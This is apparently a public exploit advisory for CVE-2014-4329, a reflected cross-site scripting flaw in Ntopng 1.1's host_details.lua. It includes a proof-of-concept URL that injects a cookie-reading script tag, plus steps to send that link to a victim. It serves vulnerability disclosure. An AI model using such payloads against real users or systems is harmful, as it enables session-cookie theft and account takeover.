# Exploit Title: Cross Site Scripting Vulnerability in Ntop-NG (CVE-2014-4329) # CVE : CVE-2014-4329 # Date: 2 July 2014 # Exploit Author: Madhu Akula # Vendor Homepage: http://www.ntop.org/ # Software Link: http://www.ntop.org/get-started/download/ # Version : Ntopng 1.1 # Severity: High # Tested on: Ubuntu & Windows # URL: http://[domain]:3000/lua/host_details.lua?host=<script>alert(document.cookie)</script> # Issue Details : Ntopng is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by the host_details.lua script. A remote attacker could exploit this vulnerability using the host parameter in a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. # Steps to replicate: (POC) 1. Replace the domain with the host and send this to Victim (or) Open it http://[domain]:3000/lua/host_details.lua?host=<script>alert(document.cookie)</script> I attached a screenshot also for POC # References : http://www.securityfocus.com/bid/66456 https://svn.ntop.org/bugzilla/show_bug.cgi?id=379 http://xforce.iss.net/xforce/xfdb/92135 http://cve.circl.lu/cve/CVE-2014-4329 http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4329 http://cxsecurity.com/cveshow/CVE-2014-4329/ http://www.secuobs.com/revue/news/519877.shtml Madhu Akula Information Security Researcher https://www.twitter.com/madhuakula